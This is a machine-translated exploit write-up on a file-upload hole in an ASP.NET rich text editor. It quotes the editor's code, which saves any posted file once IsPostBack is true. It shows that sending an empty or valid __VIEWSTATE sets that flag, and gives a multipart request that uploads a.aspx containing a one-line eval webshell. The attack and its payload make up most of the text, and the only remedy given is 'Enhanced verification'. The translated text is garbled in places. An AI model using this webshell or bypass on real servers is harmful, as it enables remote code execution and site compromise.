A Rich Text Editor File Upload Vulnerability (on how to control the IsPostBack value)

A Rich Text Editor File Upload Vulnerability (on how to control the IsPostBack value)

The Amir Rich Text Editor is actually a small product. Let's take a look at how to control the IsPostBack value of. NET.

 

 

In this text editor, you can directly upload a file without any buttons (only the insert file upload button is useless), but the Code hides such a function:

Protected override void RenderContents (HtmlTextWriter output) {if (this. page. isPostBack) // determine whether the first access is successful. this is a small key point {// if there is an uploaded file HttpFileCollection UploadFile = this. page. request. files; for (int I = 0; I <UploadFile. count; I ++) {HttpPostedFile file = UploadFile [I]; string FileName = Path. getFileName (file. fileName); string StrPath = this. page. mapPath ("~ /Uploads/"); try {file. saveAs (Path. combine (StrPath, FileName);} catch (DirectoryNotFoundException DirectoryNullException) {output. write (DirectoryNullException. message) ;}} Page. clientScript. getPostBackEventReference (this. page, string. empty); HtmlSourceInitializer. initializeHtmlSource (this. page); output. write (HtmlSourceInitializer. richTextHtmlSource. toString () ;}</code>

RenderContents is a method automatically called when a custom control is drawn. This editor directly overwrites it.

This. Page. IsPostBack indicates whether to access the Page for the first time ".

For more information, see:

Http://msdn.microsoft.com/zh-cn/library/system.web.ui.page.ispostback.aspx

Therefore, the control of the IsPostBack value is the key to whether the file can be uploaded successfully.

Therefore, let's first consider whether there is a more comprehensive method that can make the IsPostBack value true (if it is true, we can upload files)

First try to upload an html file:

<Html>

<Form action = "http: // 1/Default. aspx" name = "test" method = "post" enctype = "multipart/form-data">

<Input type = "file" name = "file" size = "23" id = "file"/>

<Input type = "submit" value = "Submit"/>

</Form>

</Html>
 

Uploaded. No file is generated in the folder:
 

So I'm sure that this method is used to upload files directly. ispostback is certainly not true!



Use the built-in demo, which contains a get data button and click
 

We can see that a lot of data is automatically submitted, and the code of inserting a file in it is:

Content-Disposition: form-data; name="file"; filename="a.aspx"Content-Type: application/xml<%@ Page Language="Jscript"%><%eval(Request.Item["w"],"unsafe");%>ai</code>

Remove other things and leave viewstate and the file code.

------WebKitFormBoundaryI4bps9FYvWWWngDbContent-Disposition: form-data; name="__VIEWSTATE"/wEPDwUKMjEyNTk0Njc3Ng9kFgRmDxYCHglpbm5lcmh0bWwFqAQ8dGl0bGU+S3VsZWguY29tPC90aXRsZT48bGluayByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJyBocmVmPScvV2ViUmVzb3VyY2UuYXhkP2Q9VE54b2cyVGt0YzA1aFdidHg3OXpBOG5UbWEyWEhUSmxrNkozSV9OUWhmVjRpeVNIcnhvRHJNSXVjSEFlTl9fd25Fb3cyMGM0VGQwWmhIeWtJcDd2S2cyJnQ9NjM0OTcxMjg4NjU2MDgyOTcwJyAvPjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgdHlwZT0ndGV4dC9jc3MnIGhyZWY9Jy9XZWJSZXNvdXJjZS5heGQ/ZD1UTnhvZzJUa3RjMDVoV2J0eDc5ekE4blRtYTJYSFRKbGs2SjNJX05RaGZWaVlLUGtBdUJJQUVteFFKU1ozejZwM0VvdVExZThWU3o2anJIODEtLU1YZzImdD02MzQ5NzEyODg2NTYwODI5NzAnIC8+PGxpbmsgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2NzcycgaHJlZj0nL1dlYlJlc291cmNlLmF4ZD9kPVROeG9nMlRrdGMwNWhXYnR4Nzl6QThuVG1hMlhIVEpsazZKM0lfTlFoZlhpYnhrVk12RTB1WndQVi1NZmg5Ui1seWt1aHVfczFGQ0tDNGRmbk12cGl3MiZ0PTYzNDk3MTI4ODY1NjA4Mjk3MCcgLz5kAgEPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGFkZH1GEi58juKz50rMm0Z+FcD3dEUs------WebKitFormBoundaryI4bps9FYvWWWngDbContent-Disposition: form-data; name="file"; filename="a.aspx"Content-Type: application/xml<%@ Page Language="Jscript"%><%eval(Request.Item["w"],"unsafe");%>ai------WebKitFormBoundaryI4bps9FYvWWWngDb—</code>

 

In this case, you can successfully upload the file:
 

First, unbind the viewstate to check whether a value such as ispostback = true exists?
 

After careful comparison, no ispostback = true is found.

Clear viewstate and make viewstate = null.
 

The file is successfully uploaded.
 

Therefore, according to the analysis, one condition of ispostback = true is that the viewstate parameter exists! As long as the viewstate is correct or null, it can be true (do not forge it out of order. If viewstate is not enabled, the system will report an error, which will be 500 ).

In summary, when the value of ispostback needs to be controlled to be true, the server will automatically determine that you are not visiting this page for the first time as long as there is a controllable viewstate value that will not report an error, you can use html code similar to the following to solve the problem:

 



You can also find some tips in these vulnerabilities, and hope you will benefit from them. This point may also be used on many other systems, and may be very effective (for example, some bypasses ).
Solution:Enhanced verification